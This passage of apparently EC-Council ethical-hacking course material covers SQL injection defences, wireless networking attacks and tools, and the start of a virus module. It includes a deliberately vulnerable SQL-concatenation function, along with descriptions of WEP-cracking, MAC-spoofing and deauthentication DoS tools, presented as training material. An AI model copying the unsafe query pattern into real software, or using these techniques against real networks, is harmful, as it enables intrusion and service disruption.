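    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE articles(id INTEGER, title TEXT, body TEXT);
        INSERT INTO articles VALUES (1, 'Welcome', 'first post');
        CREATE TABLE admin_login(login_name TEXT, password TEXT);
        INSERT INTO admin_login VALUES ('yuri', 's3cret');
    """)
    return conn


def lookup_unsafe(conn, raw_id):
    """The slides' vulnerable pattern: untrusted input concatenated into SQL."""
    sql = "SELECT title, body FROM articles WHERE id=" + raw_id
    return conn.execute(sql).fetchall()


def validate_id(raw_id):
    """Input validation with a bound check: only a short positive integer is
    acceptable for id. Escaping single quotes would not help here; the UNION
    payload contains none."""
    if not raw_id.isdigit() or len(raw_id) > 9 or int(raw_id) == 0:
        raise ValueError("id must be a positive integer")
    return int(raw_id)


def lookup_safe(conn, raw_id):
    """Parameterized query: the value travels separately from the SQL text,
    so it can never change the statement's structure."""
    sql = "SELECT title, body FROM articles WHERE id=?"
    return conn.execute(sql, (validate_id(raw_id),)).fetchall()


def safe_rejects(conn, raw_id):
    """True if the validated path refuses the input."""
    try:
        lookup_safe(conn, raw_id)
    except ValueError:
        return True
    return False


def restrict_to_articles(action, table, column, db_name, trigger):
    """Least privilege for the web application's connection: deny reading
    any table except articles. SQLite's authorizer callback stands in for
    a GRANT/DENY on SQL Server."""
    if action == sqlite3.SQLITE_READ and table != "articles":
        return sqlite3.SQLITE_DENY
    return sqlite3.SQLITE_OK


def least_privilege_connection():
    conn = build_db()
    conn.set_authorizer(restrict_to_articles)
    return conn


def injection_blocked_by_privileges():
    """Even through the vulnerable code, the UNION cannot reach admin_login:
    the statement fails at prepare time with 'not authorized'."""
    try:
        lookup_unsafe(least_privilege_connection(), UNION_PAYLOAD)
    except sqlite3.DatabaseError:
        return True
    return False


if __name__ == "__main__":
    print("unsafe:", lookup_unsafe(build_db(), UNION_PAYLOAD))
    print("validated:", safe_rejects(build_db(), UNION_PAYLOAD))
    print("least privilege:", injection_blocked_by_privileges())
```

The three layers are independent: validation stops malformed input at the edge, the parameterized query removes the injection primitive even for input that passes validation, and the restricted connection limits what a bug in either still exposes, which is the "minimize privileges" bullet made concrete.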
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Summary

© SQL injection is an attack methodology that targets the data residing in a database

© It attempts to modify the parameters of a web-based application in order to alter the SQL statements that are parsed to retrieve data from the database

© Database footprinting is the process of mapping out the tables on the database and is a crucial tool in the hands of an attacker

© Exploits occur due to coding errors as well as inadequate validation checks

© Prevention involves enforcing better coding practices and database administration procedures
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Ethical Hacking

Module XV

Hacking Wireless Networks

Scenario

© A prankster used the speakers at the food joint to make personal and offending statements about the customers who came to pick up their orders from the counter. Something was very wrong with the speaker system.

© The management of the Snack Bar had a difficult time calming the furious customers. Even their most loyal customers were extremely offended. A lot of business was being lost, resulting in big financial losses for the Snack Bar.

© The results of a police investigation totally surprised the Snack Bar management. Upon investigation, the officers found that the culprit was an ex-employee who was fired for indecent behavior with a customer. It was a clear example of wireless hacking, where the hacker tapped into the wireless frequency of the speaker system.

© What if the same thing were to happen to a radio broadcasting organization? Can you imagine the ramifications?

EC-Council

Copyright © by EC-Council
All Rights reserved. Reproduction is strictly prohibited




© Wireless Networking Concept

© Effect on Business of Wireless Attacks

© Basics of Wireless Networks

© Components of a Wireless LAN

© Types of Wireless Networks and Setting Up a WLAN

© Detecting and Getting into a WLAN

© Access Point Positioning and Antennas

© SSIDs, WEP, Related Technologies, and Carrier Networks

© MAC Sniffing and AP Spoofing

© Different Types of Wireless Attacks (Such as DoS or MITM)

© Hacking Tools

© WIDZ and RADIUS
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Module Flow

[Flow diagram: Introduction -> Business and Wireless Attacks -> Components of a Wireless Network -> How to Set Up a WLAN -> Types of Wireless Networks -> Rogue Access Points -> What is WEP? -> MAC Spoofing -> DoS Attacks -> DoS Attack Tools -> Scanning Tools -> Sniffing Tools -> WIDZ -> Countermeasures]
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Introduction to Wireless Networking

© Wireless networking technology is becoming increasingly popular and at the same time has introduced several security issues.

© The popularity of wireless technology is driven by two primary factors: convenience and cost.

© A wireless local area network (WLAN) allows workers to access digital resources without being locked to their desks.

© Laptops can be taken to meetings, or even to Starbucks, and connected to a wireless network. This convenience has become more affordable.
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Business and Wireless Attacks

© As more and more firms use wireless networks, security becomes more of a problem.

© Business is at high risk from whackers (wireless hackers) who don't require physical entry into a business network to hack, but can easily compromise the network with the help of freely available tools.

© Warchalking, Wardriving, and Warflying are some of the ways in which a whacker can assess the vulnerability of a firm's network.
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Basics

The first wireless standard was 802.11. It defines three physical layers:

• Frequency Hopping Spread Spectrum (FHSS)

• Direct Sequence Spread Spectrum (DSSS)

• Infrared

© 802.11a: More channels, high speed, less interference

© 802.11b: Protocol of the Wi-Fi revolution, de facto standard

© 802.11g: Similar to 802.11b, only faster

© 802.11i: Improves WLAN security

© 802.16: Long-distance wireless infrastructure

© Bluetooth: Cable replacement option

© 900 MHz: Low speed, coverage, backward compatibility
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Components of a Wireless Network

There are three
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Types of Wireless Networks

There are four basic types:

• Peer to Peer

• Extension to a wired network

• Multiple access points

• LAN to LAN wireless network
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Setting Up a WLAN

© When setting up a WLAN, the channel and service set identifier (SSID) must be configured in addition to traditional network settings such as IP address and subnet mask.

© The channel is a number between 1 and 11 (between 1 and 13 in Europe) and designates the frequency on which the network will operate.

© The SSID is an alphanumeric string that differentiates networks operating on the same channel.

© It is essentially a configurable name that identifies an individual network. These settings are important factors when identifying WLANs and sniffing traffic.
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© Using an operating system, such as Windows XP or a Mac with AirPort, to detect available networks

© Using handheld PCs (Tool: MiniStumbler)

© Using passive scanners (Tool: Kismet, KisMAC)

© Using active beacon scanners (Tool: NetStumbler, MacStumbler, iStumbler)
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© Use a laptop with a wireless NIC (WNIC)

© Configure the NIC to automatically set up its IP address, gateway, and DNS servers

© Use the software that came with the NIC to automatically detect and go online

© One of the ways to check if the system is online is to run an intrusion detection system

© An IDS alerts when the device gets any kind of network traffic

© An easier way is to find access points (AP) by running software such as WiFi Finder or NetStumbler
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Advantages and Disadvantages of a Wireless Network

© Advantages are:

• Mobility

• Cost-effective in the initial phase

• Easy connection

• Different ways to transmit data

• Easy sharing

© Disadvantages are:

• Mobility

• High cost post-implementation

• No physical protection of networks

• Hacking has become more convenient

• Risk of data sharing is high
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Antennas

© Antennas are very important for sending and receiving radio waves.

© They convert electrical impulses into radio waves and vice versa.

© There are two types of antennas:

• Omni-directional antennas

• Directional antennas

© Can antennas are also very popular in the wireless community and are used mostly for personal use.
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© The SSID is a unique identifier that wireless networking devices use to establish and maintain wireless connectivity

© The SSID acts as a single shared identifier between access points and clients

© Security concerns arise when the default values are not changed, as these units can be easily compromised

© A non-secure access mode allows clients to connect to the access point using the configured SSID, a blank SSID, or an SSID configured as "any"
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Access Point Positioning

© An access point is a piece of wireless communications hardware that creates a central point of wireless connectivity

© Wireless access points must be deployed and managed in common areas of the campus and they must be coordinated with Telecommunications and Network Managers.

© Similar to a "hub," the access point is a common connection point for devices in a wireless network.
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Rogue Access Points

© A rogue/unauthorized access point is one that is not authorized for operation by a particular firm or network

© Tools that can detect rogue/unauthorized access points include NetStumbler and MiniStumbler

© The two basic methods for locating rogue access points are:

• Beaconing/requesting a beacon

• Network sniffing: looking for packets in the air
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Tools to Generate Rogue Access Points: FakeAP

© FakeAP provides the means of hiding in plain sight, making it unlikely that an organization's real access points are picked out of the noise

© FakeAP confuses wardrivers, NetStumblers, script kiddies, and other undesirables

© Black Alchemy's FakeAP generates thousands of counterfeit 802.11b access points

© FakeAP is a proof of concept released under the GPL

© FakeAP runs on Linux and BSD
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Tools to Detect Rogue Access Points: NetStumbler

© NetStumbler is a Windows utility for wardriving written by Marius Milner.

© NetStumbler is a high-level WLAN scanner. It operates by sending a steady stream of broadcast probe requests on all possible channels.

© Access points (AP) respond to these probes to verify their existence, even if beacons have been disabled.

© NetStumbler displays:

• Signal strength

• MAC address

• SSID

• Channel details
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Tools to Detect Rogue Access Points: MiniStumbler

© MiniStumbler is the smaller sibling of a free product called NetStumbler.

© By default most WLAN access points (APs) broadcast their Service Set Identifier (SSID) to anyone who will listen. This behaviour is what MiniStumbler relies on.

© It can connect to a global positioning system (GPS).

[Screenshot: MiniStumbler]
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What Is Wired Equivalent Privacy (WEP)?

© WEP is a component of the IEEE 802.11 WLAN standards. Its primary purpose is to provide for confidentiality of data on wireless networks at a level equivalent to that of wired LANs.

© Wired LANs typically employ physical controls to prevent unauthorized users from connecting to the network and viewing data. In a wireless LAN, the network can be accessed without physically connecting to the LAN.

© IEEE chose to employ encryption at the data link layer to prevent unauthorized eavesdropping on a network. This is accomplished by encrypting data with the RC4 stream cipher, keyed with the shared WEP key and a per-packet 24-bit initialization vector (IV) that is sent in the clear.
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WEP Tool: Aircrack

[Screenshot: aircrack 2.1 - (C) 2004 Christophe Devine. usage: aircrack <pcap filename(s)>; options shown: specify beginning of the key, bruteforce fudge factor (current: 2), packet MAC filter (00:00:00:00:00:00), WEP key length in bits (current: 128), read IVs from a specified pcap file, start cracking (with 0 WEP IVs).]

© 802.11 sniffer and WEP key cracker

© Recovers 40-bit or 104-bit WEP keys

© Implements the FMS attack with some new attacks

© Supports Windows, Linux, and MacOS
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WEP Tool: AirSnort

© AirSnort is a wireless LAN (WLAN) tool which recovers encryption keys on 802.11b WEP networks

© AirSnort operates by passively monitoring transmissions, computing the encryption key when enough packets have been gathered

© AirSnort runs under Linux, and requires that the wireless NIC be capable of RF monitor mode, and that it pass monitor mode packets up via the PF_PACKET interface

http://airsnort.shmoo.com/
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WEP Tool: WEPCrack

© WEPCrack is an open source tool for breaking 802.11 WEP secret keys

© This tool is an implementation of the attack described by Fluhrer, Mantin, and Shamir in the paper "Weaknesses in the Key Scheduling Algorithm of RC4"

© While AirSnort has captured the media attention, WEPCrack was the first publicly available code that demonstrated the above attack

© The current tools are Perl-based and are composed of the following scripts:

• WeakIVGen.pl

• prism-getIV.pl

• WEPCrack.pl

wepcrack.sourceforge.net/
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What is WPA?

© WPA is not an official IEEE standard, but is designed to be compatible with the upcoming 802.11i security standard

© WPA (Wi-Fi Protected Access) is a data encryption method for 802.11 WLANs

© WPA resolves the issue of weak WEP headers, the initialization vectors (IVs) combined with a static key, by deriving per-packet keys (TKIP)

© WPA is designed to be a software upgrade to existing hardware

© With WPA, the rekeying of global encryption keys is required
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Related Technology and Carrier Networks

© CDPD: Cellular Digital Packet Data (TDMA)

© 1xRTT on CDMA (Code Division Multiple Access): Mobile phone carrier networks

© GPRS: General Packet Radio Service on GSM (Global System for Mobile Communications)

© FRS (Family Radio Service) and GMRS (General Mobile Radio Service): Radio services

© HPNA (Home Phone Networking Alliance) and Powerline Ethernet: Non-traditional networking protocols

© 802.1x: Port security for network communications

© BSS (Basic Service Set): Access point - bridges wired and wireless network

© IBSS (Independent Basic Service Set): peer-to-peer or ad-hoc operation mode
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MAC Sniffing and AP Spoofing

© MAC addresses are easily sniffed by attackers since they must appear in the clear even when WEP is enabled.

© An attacker can use this to masquerade as a valid MAC address by programming the wireless card, getting into the wireless network and using the wireless pipes.

© Spoofing MAC addresses is very easy. Using packet-capturing software, an attacker can determine a valid MAC address from a single packet.

© To perform a spoofing attack, an attacker must set up a (rogue) access point near the target wireless network or in a place where a victim may believe that wireless Internet is available.

Tool to Detect MAC Spoofing: Wellenreiter v2

© Wellenreiter is a wireless network discovery and auditing tool

© It is the easiest Linux scanning tool to use

© It can discover networks (BSS/IBSS) and detect ESSID broadcasting or non-broadcasting networks and their WEP capabilities and the manufacturer automatically

© It also identifies traffic that is using a spoofed MAC address without relying on the MAC OUI information

© DHCP and ARP traffic is decoded and displayed to give further information about the networks

© An ethereal/tcpdump-compatible dump file and an application save file are automatically created

© Using a supported GPS device and gpsd, the location of the discovered networks can be tracked
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Wellenreiter II

[Screenshot: Wellenreiter II log window]

[23:20:11] Wellenreiter has been started.
[23:20:11] Running on 'Unknown'.
[23:20:23] Started Scanning.
[23:20:25] New network: ESSID 'Vanille'
[23:20:25] New Access Point in 'Vanille' [6]
[23:21:17] New Wireless Station in 'Vanille' [kk]
[23:21:19] WARNING: Unhandled IBSS traffic!
[23:21:25] WARNING: Unhandled IBSS traffic!
[23:21:26] WARNING: Unhandled IBSS traffic!
[23:21:28] WARNING: Unhandled IBSS traffic!
[23:21:43] WARNING: Unhandled IBSS traffic!
[23:21:56] New Station in 'Vanille' [kk]
[23:22:42] Stopped Scanning.
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Terminology

© WarWalking - Walking around to look for open wireless networks

© Wardriving - Driving around to look for open wireless networks

© WarFlying - Flying around to look for open wireless networks

© WarChalking - Using chalk to identify available open networks

© Bluejacking - Sending unsolicited messages to another person's cell phone using Bluetooth technology

© Global Positioning System (GPS) - Can also be used to help map the open networks that are found
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© Wireless LANs are susceptible to the same protocol-based attacks that plague wired LANs

© WLANs send information via radio waves on public frequencies, making them susceptible to inadvertent or deliberate interference from traffic using the same radio band

© Types of DoS attacks:

• Physical Layer

• Data-Link Layer

• Network Layer
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DoS Attack Tool: FataJack

© FataJack is a modified WLAN-Jack that sends a deauth instead of an auth.

© This tool highlights poor AP security and works by sending authentication requests to an AP with an inappropriate authentication algorithm and status code. This causes most APs to drop the relevant associated session.
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Man-in-the-Middle Attack (MITM)

© Two types of MITM:

• Eavesdropping

- Happens when an attacker receives a data communication stream

- Not using security mechanisms such as IPsec, SSH, or SSL makes data vulnerable to an unauthorized user

• Manipulation

- An extended step of eavesdropping

- Can be done by ARP poisoning

[Figure: Eavesdropping and Manipulating]
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Scanning Tools

© Redfang 2.5

© Kismet

© THC-WarDrive

© PrismStumbler

© MacStumbler

© Mognet

© WaveStumbler

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© StumbVerter

© AP Scanner

© SSID Sniff

© Wavemon

© Wireless Security Auditor

© AirTraf

© WiFi Finder

© AirMagnet
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Scanning Tool: redfang

© Written by Ollie Whitehouse

© Searches for non-discoverable Bluetooth-enabled devices by brute-forcing the last six bytes of the device's Bluetooth address and doing a read_remote_name()

Scanning Tool: Kismet

© Completely passive, capable of detecting traffic from APs and wireless clients alike (including NetStumbler clients) as well as closed networks.

© Requires an 802.11b card capable of entering RF monitoring mode. Once in RF monitoring mode, the card is no longer able to associate with a wireless network.

© Kismet needs to run as root, but can switch to a lesser privileged UID as it begins capture.

© To hop across channels run kismet_hopper -p.

© A closed network with no clients authenticated is shown by <no ssid>, updated when a client logs on.

www.kismetwireless.net

[Screenshot: Kismet curses interface, Network List (Autofit)]

Name                     T  W  Ch  Packts  Flags  Data  Clnt
p@thflnd3r               A  Y  06     171           70    35
(no ssid)                A  N  05       1            0     0
KrullNetl                A  Y  06      27            0     0
linksys                  A  N  06      81  FU4       8     2
marley                   A  N  06     312           17     1
(no ssid)                D  N  --      20  A2       20    18
PARMAS                   A  N  07      30            0     0
(no ssid)                A  Y  06       1            0     0
GRXWirelessNetwork       A  Y  06       2            0     0
SECMAS                   A  N  07      13            0     0
(no ssid)                D  N  --       1  A4        1    56
(Lucent Outdoor Router)  O  N  --     267          267     1

Status:
Found IP 159.139.90.1 for (no ssid)::00:04:76:BB:A7:04 via ARP
Found IP 159.139.90.1 for (no ssid)::00:04:76:BB:A7:04 via ARP
Found IP 159.139.90.1 for (no ssid)::00:04:76:BB:A7:04 via ARP
Found IP 159.139.120.13 for (no ssid)::00:B0:D0:DE:60:E3 via TCP
Scanning Tool: THC-WarDrive v2.1

© A Linux-based tool

© THC-WarDrive is a tool for mapping the city for wavelan networks with a GPS device while driving a car or walking through the streets

© It is effective and flexible, a "must-download" for all wavelan nerds

© Supports NMEA GPS devices

© Free to download at http://www.thc.org/releases.php
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Scanning Tool: prismstumbler 



© Prismstumbler is a wireless LAN (WLAN) scanner that scans for beacon frames from access points.

© Prismstumbler operates by constantly switching channels and monitors any frames received on the currently selected channel.

© The program was created by using ideas and code snippets from prismdump, AirSnort, and Ethereal.

© Prismstumbler will also find private networks. Since the method used in prismstumbler is receive only, it can also find networks with weaker signals and discover more networks.



[Screenshot: Prismstumbler 0.7.0 window with "Scanner active" and "Dump active" controls, Try Connect, Track, Jump to active and Preferences buttons, and a list of discovered BSSIDs.]
http://prismstumbler.sourceforge.net/
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Scanning Tool: MacStumbler 



© MacStumbler is a utility used to display information about nearby 802.11b and 802.11g wireless access points.

© It is mainly designed to be a tool to help find access points while traveling, or to diagnose wireless network problems.

© MacStumbler requires an Apple Airport Card and MacOS 10.1 or greater. MacStumbler doesn't currently support any kind of PCMCIA or USB wireless device.



[Screenshot: MacStumbler window listing nearby networks with SSID, channel, signal, noise, WEP and vendor columns. The details pane shows a Linksys access point named "private" on channel 11 with WEP enabled and a GPS position; the log lists "private" (Linksys, channel 11, WEP) and "default" (D-Link, channel 6, no WEP), both seen 03:17 PM 07/02/03.]
http://www.macstumbler.com/
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Scanning Tool: Mognet v1.16



© Mognet is a simple, lightweight 802.11b sniffer written in Java and available under the GPL.

© It features real-time capture output, support for all 802.11b generic and frame-specific headers, easy display of frame contents in hex or ASCII, text mode capture for GUI-less devices, and loading/saving capture sessions in libpcap format.

© Mognet requires a Java Development Kit 1.3 or higher, and a working C compiler for native code compilation.



[Screenshot: Mognet capture window listing beacon frames by Type, Source, Dest (ff:ff:ff:ff:ff:ff) and SSID (e.g. linksys), with a Detail pane (Hex Dump / ASCII Dump) showing source address, destination address, BSS Id, fragment number 6, sequence number 2822, and "Frame number: 66, Frame size: 60 bytes".]
http://www.node99.org/projects/mognet/
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Scanning Tool: WaveStumbler 



© WaveStumbler is a console-based 802.11 network mapper for Linux

© It reports the basic AP information like channel, WEP, ESSID, and MAC

© It consists of a patch against the kernel driver, orinoco.c, which makes it possible to send the scan command to the driver via the /proc/hermes/ethX/cmds file

© The answer is then sent back via a netlink socket

© WaveStumbler listens to this socket and displays the output data on the console

http://www.cqure.net/tools.jsp?id=08
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Scanning Tool: StumbVerter v1.5



© StumbVerter is a standalone application that allows Network Stumbler's summary files to be imported into Microsoft's MapPoint 2004 maps.

© The logged WAPs will be shown with small icons, their color and shape relating to WEP mode and signal strength.

© As the AP icons are created as MapPoint pushpins, the balloons contain other information, such as MAC address, signal strength, and mode.

http://www.sonar-security.com/
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Scanning Tool: NetChaser v1.0 for Palm Tops



© System Requirements

• Palm Tungsten C Handheld Computer

• Main Screen

- Tap on access point to connect

- Signal strength display

- Access point SSID

- WEP status

- Loss-of-signal time display

- Current battery voltage and time

• Access Point Info

- AP MAC address

- AP SSID

- Signal strength

- Channel

- Loss-of-signal time and date display

- Latitude and longitude of strongest signal

• Full Logging Support

- Log all access point data to a file for post-processing

- CSV standard file suitable for import into any database or spreadsheet



[Screenshot: NetChaser screens. An access point detail view shows SSID "simply", MAC address, signal -78 dBm, channel 6, last seen time, latitude/longitude and "WEP is enabled."; a scan list ("21 APs Found") shows SSIDs such as law-school, default, linksys, SAVAGE and <NO NAME> with the time each was seen, and Stop Scan / GPS / Clear List buttons.]

http://www.bitsnbolts.com/netchaser.html
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Scanning Tool: AP Scanner 



© AP Scanner is an application that shows a graph of the channel usage of all open wireless access points within range

http://www.versiontracker.com/
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Scanning Tool: Wavemon 



© Wavemon is an ncurses-based monitor for wireless devices

© Wavemon allows watching of signal and noise levels, packet statistics, device configuration, and network parameters of hardware or wireless network

© It has currently only been tested with the Lucent Orinoco series of cards, although it should work (with varying features) with all devices supported by the wireless kernel extensions written by Jean Tourrilhes






[Screenshot: wavemon display with bar graphs for signal level (dBm), noise level (dBm) and S-N ratio (dB).]

http://freshmeat.net/projects/wavemon/
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Scanning Tool: Wireless Security 
Auditor (WSA) 



© An IBM research prototype of an 802.11 wireless LAN security auditor, running on Linux or an iPAQ PDA

© WSA helps network administrators by auditing the wireless network for security

© Vulnerabilities in the network can be discovered before hackers break into the network



[Screenshot: Wireless Security Auditor window (File, Options, Help) listing access points by MAC address and SSID (e.g. "tsunami", "IBM") with signal-strength percentages.]

http://www.research.ibm.com/gsal/wsa/
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Scanning Tool: AirTraf 1.0



© AirTraf 1.0 is a wireless sniffer that can detect and determine exactly what is being transmitted over 802.11 wireless networks.

© It is developed as an open source program.

© It tracks and identifies legitimate and rogue access points, keeps performance statistics on a by-user and by-protocol basis, measures the signal strength of network components, and more.
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Scanning Tool: Wifi Fi 



© Checks for 802.11b and 802.11g signals without a computer or PDA

© The user interface consists of a single button and three LEDs that indicate available signal strength



http://www.kensington.com/ 
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Sniffing Tools 



© AiroPeek 

© NAI Wireless Sniffer 

© Ethereal 

© VPN monitor I 

© Aerosol v0.65

© vxSniffer 

© EtherPEG 

© DriftNet 

© WinDump 

© ssidsniff 
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Sniffing Tool: AiroPeek



© A wireless management tool needed to deploy, secure, and troubleshoot the wireless LAN

© Covers the whole wireless LAN management, including site surveys, security assessments, client troubleshooting, WLAN monitoring, remote WLAN analysis, and application layer protocol analysis

© Has an enhanced analysis of VoIP

http://www.wildpackets.com/products/airopeek_nx 
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Sniffing Tool: NAI Wireless Sniffer



© Developed by Network Associates, Inc.

© Used for rogue mobile unit detection. It gathers a list of all the wireless devices, whether they're access units or mobile devices, and labels them as such.
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MAC Sniffing Tool: Ethereal






© Ethereal is a free network protocol analyzer for Unix and Windows

© It allows examination of data from a live network or from a capture file on disk

© Ethereal has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session



[Screenshot: Ethereal packet list showing ARP requests sent to ff:ff:ff:ff:ff:ff ("Who has 192.168.0.1"), DNS standard queries from bam.zing.org, and a TCP session to slashdot.org followed by an HTTP GET.]
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Sniffing Tool: Aerosol v0.65



© Aerosol is easy to use wardriving software for PRISM 2 Chipset, ATMEL USB, and WaveLAN

© It's lightweight, written in C, and free



[Screenshot: Aerosol window with Card, Statistics and Settings tabs showing channel, signal strength, the last BSS detected (23/1/03 18:13:40, SSID "test", vendor D-Link, MAC 00:05:5d:ee:4c:1c, channel 10) and card status "Connected to ESS".]
http://www.stolenshoes.net/sniph/aerosol-0.65-readme.html 
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Sniffing Tool: vxSniffer 



© vxSniffer is a complete network monitoring tool for Windows CE-based devices

© It operates on all Handheld 2000 HPCs, Pocket PCs, Pocket PC 2002s, and Windows Mobile 2003s

© It requires an ethernet adapter with an NDIS compatible driver

© vxSniffer is licensed software

http://www.cam.com/vxSniffer.html
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Sniffing Tool: Etherpeg 



© Watches the local network for traffic, reassembles out-of-order TCP streams, and scans the result for data that looks like a GIF or JPEG

© A simple but effective hack that indiscriminately shows all image data that it can assemble

© The source code is freely available and compiles easily with a simple make from the terminal window
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Sniffing Tool: Driftnet



© Based on the lines of EtherPEG

© It is a program which listens to network traffic and picks out images from TCP streams it observes

© In the beta version, driftnet picks out MPEG audio streams from network traffic and tries to play them
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© AirMagnet v1.2 is a new tool from AirMagnet

© It is similar to MiniStumbler except it has a GPS option

© This tool is used not only for sniffing out wireless networks, but for the deployment and administration of WLANs in organizations

© AirMagnet uses many levels of graphics and animations to display real-time statistics of WLANs in the area

© AirMagnet not only displays the unsecured networks, but also gives a list of possible security holes and configuration problems with WLANs in the area
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[Screenshot: AirMagnet handheld display showing per-channel signal levels (channels 1-14), scan results, an Ad-Hoc indicator, Expert Advice and Security sections, and "Total Frames 725".]
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© WinDump is the porting to the Windows platform of tcpdump, the most used network sniffer/analyzer for UNIX

© WinDump is fully compatible with tcpdump and can be used to watch and diagnose network traffic according to various complex rules

© It can run under Windows 95/98/ME/NT/2000/XP
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Command Prompt - windump -i 2

C:\Documents and Settings\Administrator\Desktop>windump -D
1.\Device\NPF_{6EAE8CBE-9F18-474E-871C-765E90C832CA} (Intel(R) PRO Adapter (Microsoft's Packet Scheduler) )
2.\Device\NPF_{8BD246F0-8175-490F-B873-483D91402181} (3Com EtherLink PCI (Microsoft's Packet Scheduler) )

C:\Documents and Settings\Administrator\Desktop>windump -i 2
windump: listening on \Device\NPF_{8BD246F0-8175-490F-B873-483D91402181}
18:58:34.226540 IP 0.0.0.0.68 > 255.255.255.255.67: xid:0x7e003f29 secs:15086 flags:0x8000 [|bootp]
18:58:50.226359 IP 0.0.0.0.68 > 255.255.255.255.67: xid:0x7e003f29 secs:15086 flags:0x8000 [|bootp]
18:59:00.679236 IP IIL-LAB08.138 > 169.254.255.255.138: udp 201
18:59:07.539492 IP IIL-LAB08.137 > 169.254.255.255.137: udp 50
18:59:08.288362 IP IIL-LAB08.137 > 169.254.255.255.137: udp 50
18:59:09.038351 IP IIL-LAB08.137 > 169.254.255.255.137: udp 50



Sniffing Tool: Ssidsniff

© A useful tool for discovering access points and saving captured traffic

© It comes with a configure script and supports Cisco Aironet and random prism2 based cards
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Multi Use Tool: THC-RUT

© It gathers information from local and remote networks

© It offers a wide range of network discovery tools: arp lookup on an IP range, spoofed DHCP request, RARP, BOOTP, ICMP-ping, ICMP address mask request, OS fingerprinting, and high-speed host discovery

© THC-RUT comes with a new OS Fingerprint implementation

http://www.thc.org/thc-rut/
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Tool: WinPcap

© WinPcap is a free public system for direct network access under Windows.

© Most networking applications access the network through widely used system primitives, like sockets. This approach allows easy transfer of data on a network, because the OS copes with low level details (protocol handling, flow reassembly, and so on) and provides an interface similar to the one used to read and write on a file.

© WinPcap can be used by different kinds of tools for network analysis, troubleshooting, security, and monitoring.
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http://winpcap.mirror.ethereal.com/install/default.htm 
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© bsd-airtools is a package that provides a complete tool set for wireless 802.11b auditing.

© It contains a bsd-based WEP cracking application, called dweputils, as well as kernel patches for NetBSD, OpenBSD, and FreeBSD.

© It also contains a curses-based AP detection application similar to netstumbler (dstumbler) that can be used to detect wireless access points and connected nodes, view signal to noise graphs, and interactively scroll through scanned APs and view statistics for each.

© It also includes other tools to provide a complete tool set for making use of all 14 of the prism2 debug modes as well as do basic analysis of the hardware-based link-layer protocols provided by prism2's monitor debug mode.

http://www.dachb0den.com/projects/bsd-airtools.html
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WIDZ: Wireless Intrusion Detection System

© WIDZ version 1 is a proof of concept IDS system for 802.11 that guards APs and monitors locally for potentially malevolent activity

© It detects scans, association floods, and bogus/rogue APs. It can easily be integrated with SNORT or RealSecure
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© MAC Address Filtering

This method uses a list of MAC addresses of client wireless network interface cards that are allowed to associate with the access point.

© SSID (Network ID)

The first attempt to secure a wireless network was the use of the Network ID (SSID). When a wireless client wants to associate with an access point, the SSID is transmitted during the process. The SSID is a seven-digit alphanumeric ID that is hard coded into the access point and the client device.

© Firewalls

Using a firewall to secure a wireless network is probably the only way to prevent unauthorized access.

© Wireless networks that use infrared beams to transport data from one point to another are very secure.
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Out of the box security 



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[Diagram: laptops associate with an Access Point that is wired to workstations and a file server on the network.]
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Radius: Used as Additional Layer in Security
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Maximum Security: Add VPN to Wireless LAN








© A wireless network enables a mobile user to connect to a LAN through a wireless (radio) connection.

© Wired Equivalent Privacy (WEP), a security protocol specified in the IEEE Wi-Fi standard, 802.11b, is designed to provide a wireless local area network (WLAN) with a level of security and privacy comparable to what is usually expected of a wired LAN.

© WEP is vulnerable because of relatively short IVs and keys that remain static.

© Even if WEP is enabled, MAC addresses can be easily sniffed by an attacker as they appear in the clear. Spoofing a MAC address is also easy.

© If an attacker holds wireless equipment near a wireless network, he could perform a spoofing attack by setting up an access point (rogue) near the target wireless network.

© Wireless networks are extremely vulnerable to DoS attacks.

© A variety of hacking and monitoring tools are available for wireless networks.

© Wireless network security can include adopting a suitable strategy of MAC address filtering, firewalling, or a combination of protocol-based measures.
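An added example in Python (not part of the course material) that puts numbers on the summary point about short IVs and static keys: WEP's IV is 24 bits, so a random IV has a 50% chance of repeating within a few thousand frames, a sequential IV counter wraps within hours on a busy link, and a monitor that sees the same IV twice under one key knows keystream has been reused. The IV sample and the link parameters are constructed, not a real capture.

```python
import math
from collections import Counter

IV_BITS = 24
IV_SPACE = 1 << IV_BITS          # 16,777,216 distinct IVs per WEP key


def iv_collision_probability(n_frames: int) -> float:
    """Probability that at least two of n_frames randomly chosen IVs coincide
    (the birthday bound), computed exactly as 1 - prod_i (1 - i/N)."""
    log_no_collision = 0.0
    for i in range(n_frames):
        log_no_collision += math.log1p(-i / IV_SPACE)
    return 1.0 - math.exp(log_no_collision)


def frames_for_collision_chance(target: float) -> int:
    """Smallest number of frames at which iv_collision_probability reaches target."""
    n, log_no_collision = 0, 0.0
    while 1.0 - math.exp(log_no_collision) < target:
        log_no_collision += math.log1p(-n / IV_SPACE)
        n += 1
    return n


def hours_to_exhaust_ivs(link_mbps: float, frame_bytes: int) -> float:
    """Time for a sequential IV counter to wrap on a saturated link sending
    frame_bytes frames back to back; after the wrap every (IV, key) pair, and
    so every RC4 keystream, is reused."""
    frames_per_second = (link_mbps * 1e6) / (frame_bytes * 8)
    return IV_SPACE / frames_per_second / 3600.0


def iv_reuse_report(ivs):
    """Given the IVs seen on one BSSID under one static key, return {iv: count}
    for every IV used more than once, which is what a monitor should alert on."""
    counts = Counter(ivs)
    return {iv: c for iv, c in sorted(counts.items()) if c > 1}


# Constructed sample, not a real capture: a card that restarts its IV counter
# at 0 after every reset, so the first few IVs repeat after each reboot.
SAMPLE_IVS = [0, 1, 2, 3, 4] + [0, 1, 2] + [0x7FFF00, 0x7FFF01]

if __name__ == "__main__":
    print(f"50% chance of an IV collision after {frames_for_collision_chance(0.5)} random IVs")
    print(f"IV counter wraps after {hours_to_exhaust_ivs(11, 1500):.1f} h at 11 Mb/s")
    print("reused IVs:", iv_reuse_report(SAMPLE_IVS))   # {0: 2, 1: 2, 2: 2}
```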
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Ethical Hacking 



Module XVI 
Virus



Scenario 



Michael is a system administrator at one of the top online share trading firms. Other than his basic job as a system administrator, Michael has to monitor shares of some firms traded at stock markets in geographical regions other than his country. So Michael has a dual role in the organization.

Michael works the night shift. One night something unusual happened. Michael was alarmed to see the size of the company's mailbox.
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Scenario

The outbox was empty the last time he had checked, but now it was flooded with mails which were sent in bulk to the respective mail ids in the address book. The system had also become slow.

This was not because of some internal error in the mail server; something serious had happened. Michael had to take the mail server off the network for further investigations.

What could have triggered such an event?

Just imagine the company's credibility if the bulk mails reached all of its clients' mailboxes.






